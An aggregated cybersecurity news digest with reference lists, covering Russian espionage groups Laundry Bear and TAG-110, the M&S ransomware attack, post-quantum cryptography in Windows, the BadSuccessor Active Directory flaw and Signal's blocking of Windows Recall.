To aid organizations in safely adopting AI, Microsoft Deputy CISO Yonatan Zunger shares guidance for efficient implementation and defense against evolving identity attack techniques. Microsoft CVP Charles Lamanna offers an AI adoption playbook, emphasizing the importance of "customer obsession" and "extreme ownership" for both startups and large enterprises navigating the age of AI. Lamanna suggests focusing on a few high-impact AI projects instead of spreading resources thinly across numerous pilots.

Recommended read:
References :

@www.helpnetsecurity.com //
A newly identified Russian cyber-espionage group, known as Laundry Bear by Dutch intelligence and Void Blizzard by Microsoft, has been actively targeting Western organizations since at least April 2024. This group is believed to be backed by the Russian government and is primarily focused on gathering intelligence to support Russian strategic interests. Laundry Bear's targets include government entities, defense contractors, aerospace firms, and high-tech businesses in Europe and North America, particularly those supporting Ukraine. The group's activities suggest an interest in sensitive information related to military goods, weapons deliveries, and advanced technologies that are difficult for Russia to acquire due to Western sanctions.

The primary objective of Laundry Bear is to steal sensitive emails and files from compromised systems. They achieve this by targeting cloud-based email environments, specifically Microsoft Exchange. The group employs a range of techniques, including pass-the-cookie attacks, password spraying, and spear phishing aimed at credential theft. Notably, the Dutch intelligence services identified Laundry Bear during an investigation into a credential-stealing attack against the Dutch National Police in September 2024. During this attack, Laundry Bear gained access to an account belonging to a Dutch police employee by using a stolen session cookie to obtain work-related contact information of other police employees.

Microsoft has also observed Laundry Bear targeting critical sectors such as government, defense, transportation, media, NGOs, and healthcare, with a focus on organizations in Europe, North America, NATO member states, and Ukraine. The group frequently gains access by using stolen credentials, likely purchased from online marketplaces. Despite employing relatively simple attack methods and readily available tools, Laundry Bear has achieved a high success rate due to quick-paced cyber operations and efficient automation. Microsoft recommends organizations implement robust security measures to defend against such threats.

Recommended read:
References :
  • The Hacker News: Microsoft has shed light on a previously undocumented cluster of malicious activity originating from a Russia-affiliated threat actor dubbed Void Blizzard (aka Laundry Bear) that it said is attributed to worldwide cloud abuse.
  • www.helpnetsecurity.com: Microsoft, Dutch security agencies lift veil on Laundry Bear cyber espionage group
  • Threats | CyberScoop: New Russian state-sponsored APT quickly gains global reach, hitting expansive targets
  • therecord.media: Recent attacks on institutions in the Netherlands were the work of a previously unknown Russian hacking group that Dutch intelligence agencies are labeling Laundry Bear. Microsoft also reported on the group, naming it Void Blizzard.
  • www.microsoft.com: Microsoft Threat Intelligence has discovered a cluster of worldwide cloud abuse activity conducted by a threat actor we track as Void Blizzard, who we assess with high confidence is Russia-affiliated and has been active since at least April 2024. Void Blizzard’s cyberespionage operations tend to be highly targeted at specific organizations of interest to Russia, including in government, defense, transportation, media, non-governmental organizations (NGOs), and healthcare sectors primarily in Europe and North America. The post appeared first on Microsoft Security Blog.
  • www.defensie.nl: Onbekende Russische groep achter hacks Nederlandse doelen - Unknown Russian group behind hacks of Dutch targets - "is behind the hacks on several Dutch organizations, including the police in September 2024.
  • Help Net Security: Microsoft, Dutch security agencies lift veil on Laundry Bear cyber espionage group
  • thecyberexpress.com: New Russian Cyber Threat ‘Laundry Bear’ Hits Western Targets
  • www.csoonline.com: New Russian APT group Void Blizzard targets NATO-based orgs after infiltrating Dutch police
  • The Register - Security: New Russian cyber-spy crew Laundry Bear joins the email-stealing pack
  • securityonline.info: Void Blizzard: New Russian Cyberespionage Group Targets NATO and Ukraine
  • securityonline.info: Void Blizzard: New Russian Cyberespionage Group Targets NATO and Ukraine
  • securityaffairs.com: Russia-linked APT Laundry Bear linked to 2024 Dutch Police attack
  • industrialcyber.co: Microsoft details Void Blizzard as Russian cyber threat targeting global critical infrastructure
  • Virus Bulletin: Microsoft Threat Intelligence, in colaboration with Dutch security organizations AIVD & MIVD, observed Void Blizzard (a.k.a. LAUNDRY BEAR) conducting espionage operations primarily targeting organizations that are important to Russian government objectives.
  • Industrial Cyber: Microsoft details Void Blizzard as Russian cyber threat targeting global critical infrastructure
  • www.cybersecuritydive.com: Microsoft, Dutch government spot new Russian hacking group targeting critical infrastructure
  • Metacurity: Russian group Laundry Bear hacked Dutch police, targets Ukraine-allied nations
  • www.metacurity.com: Russian group Laundry Bear hacked Dutch police, targets Ukraine-allied nations
  • Vulnerable U: Void Blizzard hackers raid NATO cloud tenants with Evilginx phishing
  • Danny Palmer: A new Russian APT (LAUNDRY BEAR) is tearing through defence and government entities in NATO member states using stripped back and heavily automated threat techniques that nonetheless went widely undetected until they were spotted by the Dutch police, the Netherlands’s security services revealed.
  • The Record: Recent attacks on institutions in the Netherlands were the work of a previously unknown Russian hacking group that Dutch intelligence agencies are labeling Laundry Bear. Microsoft also reported on the group, naming it Void Blizzard.
  • www.scworld.com: Russian hackers Void Blizzard step up espionage campaign
  • The Hacker News: Russia-Linked Hackers Target Tajikistan Government with Weaponized Word Documents

Ddos@securityonline.info //
A new cyber-espionage campaign has been uncovered, targeting public sector organizations in Tajikistan. The threat actor behind this campaign is TAG-110, a group linked to Russia and also known as UAC-0063 and APT28 (BlueDelta). Recorded Future’s Insikt Group discovered that TAG-110 is using macro-enabled Microsoft Word templates (.dotm files) to gain access to and exfiltrate intelligence from Tajik government, educational, and research institutions, particularly those involved in military affairs or electoral processes. This campaign reflects Russia’s strategic interest in Central Asia through intelligence-gathering operations.

These malicious Word templates are deployed through phishing lures disguised as official Tajik government documents. The templates are saved in the Microsoft Word STARTUP folder, ensuring automatic execution each time Word is launched. This tactic represents a shift from TAG-110’s previous use of HTA-based payloads like HATVIBE. The two malicious documents identified are themed around radiation safety for Tajikistan’s armed forces and election schedules in Dushanbe.

Upon execution, the embedded VBA macros collect system metadata such as username, computer name, language, and resolution. This data is then sent to a hardcoded command-and-control (C2) server. The macros also establish persistence by copying themselves to the %APPDATA%\Microsoft\Word\STARTUP\ directory. Researchers state that this evolution highlights a tactical shift prioritizing persistence. The use of .dotm files and VBA macros allows TAG-110 to maintain a stealthy presence and collect data from compromised systems, turning them into surveillance nodes.

Recommended read:
References :
  • securityonline.info: Russian-Aligned TAG-110 Targets Tajikistan Governments with Stealthy Cyber-Espionage
  • cyberpress.org: TAG-110 Hackers Use Malicious Word Templates for Targeted Attacks
  • gbhackers.com: TAG-110 Hackers Deploy Malicious Word Templates in Targeted Attacks
  • securityonline.info: Russian-Aligned TAG-110 Targets Tajikistan Governments with Stealthy Cyber-Espionage
  • The Hacker News: The Russia-aligned threat actor known as TAG-110 has been observed conducting a spear-phishing campaign targeting Tajikistan using macro-enabled Word templates as an initial payload.

Dhara Shrivastava@cysecurity.news //
Marks & Spencer (M&S) and Co-op, major UK retailers, have been hit by a Scattered Spider cyberattack involving DragonForce ransomware. The attack has caused weeks-long disruptions, impacting online transactions and the availability of food, fashion, and home goods. M&S warns that the disruption to online transactions could last until July. The cybercrime gang Scattered Spider is also believed to be behind attacks on other UK retailers, including Harrods.

The financial impact on M&S is expected to be significant. The company anticipates the cyberattack will cut $400 million from its profits and reported losing over £40 million in weekly sales since the attack began over the Easter bank holiday weekend. As a precaution, M&S took down some of its systems, resulting in short-term disruptions. This decision was made to protect its systems, customers, and partners from further compromise.

In response to the attack, M&S plans to accelerate its technology improvement plan, shortening the timeframe from two years to six months. This reflects the urgent need to bolster its cybersecurity defenses and prevent future disruptions. The company previously outlined plans in 2023 to improve its technology stack, including investments in infrastructure, network connectivity, store technology, and supply-chain systems. M&S acknowledged that personal data of customers had been stolen, including names, dates of birth, telephone numbers, home and email addresses, and online order histories. However, the retailer insisted that the data theft did not include usable card, payment, or login information.

Recommended read:
References :
  • www.cysecurity.news: Scattered Spider Cyberattack Cripples M&S, Co-op: DragonForce Ransomware Causes Weeks-Long Disruption
  • www.cybersecuritydive.com: M&S warns April cyberattack will cut $400 million from profits
  • Tech Monitor: Marks & Spencer faces £300m impact on profit from cyberattack
  • techxplore.com: Marks & Spencer cyberattack: How can retailers regain customers' trust after a hack?

@www.microsoft.com //
References: cyberinsider.com , Dan Goodin , medium.com ...
Microsoft is taking a significant step towards future-proofing cybersecurity by integrating post-quantum cryptography (PQC) into Windows Insider builds. This move aims to protect data against the potential threat of quantum computers, which could render current encryption methods vulnerable. The integration of PQC is a critical step toward quantum-resilient cybersecurity, ensuring that Windows systems can withstand attacks from more advanced computing power in the future.

Microsoft announced the availability of PQC support in Windows Insider Canary builds (27852 and above). This release allows developers and organizations to begin experimenting with PQC in real-world environments, assessing integration challenges, performance trade-offs, and compatibility. This is being done in an attempt to jump-start what’s likely to be the most formidable and important technology transition in modern history.

The urgency behind this transition stems from the "harvest now, decrypt later" threat, where malicious actors store encrypted communications today, with the intent to decrypt them once quantum computers become capable. These captured secrets, such as passwords, encryption keys, or medical data, could remain valuable to attackers for years to come. By adopting PQC algorithms, Microsoft aims to safeguard sensitive information against this future risk, emphasizing the importance of starting the transition now.

Recommended read:
References :
  • cyberinsider.com: Microsoft has begun integrating post-quantum cryptography (PQC) into Windows Insider builds, marking a critical step toward quantum-resilient cybersecurity. Microsoft announced the availability of PQC support in Windows Insider Canary builds (27852 and above). This release allows developers and organizations to begin experimenting with PQC in real-world environments, assessing integration challenges, performance trade-offs, and compatibility with …
  • Dan Goodin: Microsoft is updating Windows 11 with a set of new encryption algorithms that can withstand future attacks from quantum computers in an attempt to jump-start what’s likely to be the most formidable and important technology transition in modern history.
  • Red Hat Security: In their article on post-quantum cryptography, Emily Fox and Simo Sorce explained how Red Hat is integrating post-quantum cryptography (PQC) into our products. PQC protects confidentiality, integrity and authenticity of communication and data against quantum computers, which will make attacks on existing classic cryptographic algorithms such as RSA and elliptic curves feasible. Cryptographically relevant quantum computers (CRQCs) are not known to exist yet, but continued advances in research point to a future risk of successful attacks. While the migration to algorithms resistant against such
  • medium.com: Post-Quantum Cryptography Is Arriving on Windows & Linux
  • www.microsoft.com: The recent advances in quantum computing offer many advantages—but also challenge current cryptographic strategies. Learn how FrodoKEM could help strengthen security, even in a future with powerful quantum computers. The post first appeared on .
  • arstechnica.com: For the first time, new quantum-safe algorithms can be invoked using standard Windows APIs.

info@thehackernews.com (The@The Hacker News //
A critical privilege escalation vulnerability has been discovered in the delegated Managed Service Account (dMSA) feature of Windows Server 2025's Active Directory. This flaw, dubbed "BadSuccessor," allows attackers with minimal permissions, specifically the ability to create objects inside an Active Directory organizational unit, to gain control over any user in the Active Directory domain, including Domain Admins. The vulnerability stems from improper permission handling during dMSA migration, where unauthorized users can simulate a migration process and inherit permissions of other accounts, even those with Domain Admin privileges. Security researchers have detailed that only write permissions over the attributes of a dMSA are required to execute this attack.

Microsoft has acknowledged the "BadSuccessor" issue in Windows Server 2025 but has rated it as moderate severity, sparking disagreement from security researchers who believe it poses a significant risk. Currently, there is no official patch available from Microsoft to address this vulnerability. This lack of an immediate patch has led security firms such as Akamai to document the privilege escalation flaw, emphasizing the potential for attackers to fully compromise an Active Directory domain by exploiting the dMSA feature. Akamai researchers found that in 91% of the environments they examined, users outside the domain admins group had the required permissions to perform this attack.

Organizations utilizing Active Directory are strongly advised to be aware of this vulnerability and actively monitor for suspicious activity related to dMSA objects. Security researchers are suggesting workarounds to mitigate the risk until Microsoft releases a formal patch. The core of the attack involves abusing the dMSA feature to elevate privileges, highlighting the importance of carefully reviewing and restricting permissions related to dMSA creation and management. Furthermore, the discovery of this vulnerability emphasizes the need for organizations to stay informed about the latest security research and apply necessary security measures to protect their Active Directory environments.

Recommended read:
References :
  • thecyberexpress.com: Active Directory dMSA Privilege Escalation Attack Detailed by Researchers
  • Davey Winder: New Windows Server 2025 Attack Compromises Any Active Directory User
  • The Hacker News: Critical Windows Server 2025 dMSA Vulnerability Enables Active Directory Compromise
  • www.csoonline.com: BadSuccessor: Unpatched Microsoft Active Directory attack enables domain takeover
  • Help Net Security: A privilege escalation vulnerability in Windows Server 2025 can be used by attackers to compromise any user in Active Directory (AD), including Domain Admins.
  • hackplayers: BadSuccessor: escalada de privilegios abusando de dMSA en Active Directory
  • www.helpnetsecurity.com: Unpatched Windows Server vulnerability allows full domain compromise
  • borncity.com: BadSuccessor: Abusing dMSA to elevate privileges in Active Directory
  • thecyberexpress.com: Active Directory dMSA Privilege Escalation Attack Detailed by Researchers
  • borncity.com: BadSuccessor: Abusing dMSA to elevate privileges in Active Directory
  • www.scworld.com: Details - Cyber Security News
  • hackread.com: BadSuccessor Exploits Windows Server 2025 Flaw for Full AD Takeover
  • Assura, Inc.: Cyber Heads Up: “BadSuccessorâ€â€”A Critical Active Directory Privilege Escalation Vulnerability in Windows Server 2025
  • www.assurainc.com: Cyber Heads Up: “BadSuccessorâ€â€”A Critical Active Directory Privilege Escalation Vulnerability in Windows Server 2025
  • securityboulevard.com: Cyber Heads Up: “BadSuccessorâ€â€”A Critical Active Directory Privilege Escalation Vulnerability in Windows Server 2025
  • ciso2ciso.com: Cyber Heads Up: “BadSuccessorâ€â€”A Critical Active Directory Privilege Escalation Vulnerability in Windows Server 2025 – Source: securityboulevard.com
  • securityboulevard.com: Cyber Heads Up: “BadSuccessorâ€â€”A Critical Active Directory Privilege Escalation Vulnerability in Windows Server 2025
  • gbhackers.com: SharpSuccessor PoC Released to Weaponize Windows Server 2025 BadSuccessor Flaw
  • cyberpress.org: SharpSuccessor: Weaponizing Windows Server 2025 BadSuccessor Vulnerability
  • securityonline.info: Windows Server 2025 “BadSuccessor” Flaw Allows Domain Takeover (PoC Available, No Patch)
  • securityonline.info: Akamai security researcher Yuval Gordon has uncovered an Active Directory privilege escalation vulnerability in Windows Server 2025, revealing
  • Cyber Security News: Critical privilege escalation vulnerability in Windows Server 2025’s Active Directory infrastructure has been weaponized through a new proof-of-concept tool called SharpSuccessor
  • gbhackers.com: A critical privilege escalation vulnerability in Windows Server 2025’s delegated Managed Service Account (dMSA) feature enables attackers to compromise Active Directory domains using tools like SharpSuccessor.
  • SOC Prime Blog: BadSuccessor Detection: Critical Windows Server Vulnerability Can Compromise Any User in Active Directory

@arstechnica.com //
Signal, the privacy-focused messaging application, has taken action to block Microsoft's controversial Recall feature from capturing screenshots of its desktop app content on Windows 11. Citing privacy concerns over Recall's ability to automatically take screenshots of on-screen activity, Signal has implemented a "screen security" setting, enabled by default, that leverages Digital Rights Management (DRM) to prevent the tool from accessing and recording private conversations. This move comes as Signal expresses discontent with Microsoft's approach, arguing that Recall lacks sufficient developer controls to exclude specific apps and protect sensitive information.

Microsoft's Recall feature, designed for Copilot+ PCs, works by continuously taking screenshots and creating a searchable database of user activity. Signal argues that this poses a significant risk to the privacy of its users, as private conversations could be inadvertently captured and stored. By implementing DRM, Signal sets a flag on its application window that instructs Recall, and any other screenshotting application, to ignore its content. While Signal acknowledges this is a blunt tool that may interfere with accessibility software, it believes Microsoft left them with no other choice.

Signal has criticized Microsoft for not providing developers with the necessary tools to manage how Recall interacts with their applications. The messaging app argues that it shouldn't have to resort to using DRM "content protection hacks" to safeguard user privacy. Signal hopes that AI teams building systems like Recall will carefully consider the privacy implications and avoid forcing apps to use workarounds to protect the integrity of their services. They want the AI teams to know that this will potentially affect accessibility options like screen readers.

Recommended read:
References :
  • security ? Ars Technica: “Microsoft has simply given us no other option,†Signal says as it blocks Windows Recall
  • The Register - Software: Signal shuts the blinds on Microsoft Recall with the power of DRM
  • www.techradar.com: Signal blasts Microsoft over Recall privacy failings, as secure messaging app is forced to fudge a way of blocking the controversial Windows 11 feature
  • Dropsafe: By Default, Signal Doesn’t Recall | Signal Windows app leverages DRM content protection hacks to hide messages from Windows Recall
  • Dan Goodin: Signal writes: "We hope that the AI teams building systems like Recall will think through these implications more carefully in the future. Apps like Signal shouldn’t have to implement “one weird trick†in order to maintain the privacy and integrity of their services without proper developer tools. People who care about privacy shouldn’t be forced to sacrifice accessibility upon the altar of AI aspirations either."
  • www.bleepingcomputer.com: Signal now blocks Microsoft Recall screenshots on Windows 11
  • CyberInsider: Signal Deploys Countermeasure to Shield Messages from Windows Recall
  • securityaffairs.com: New Signal update stops Windows from capturing user chats
  • Schneier on Security: Signal Blocks Windows Recall
  • cyberinsider.com: Signal Deploys Countermeasure to Shield Messages from Windows Recall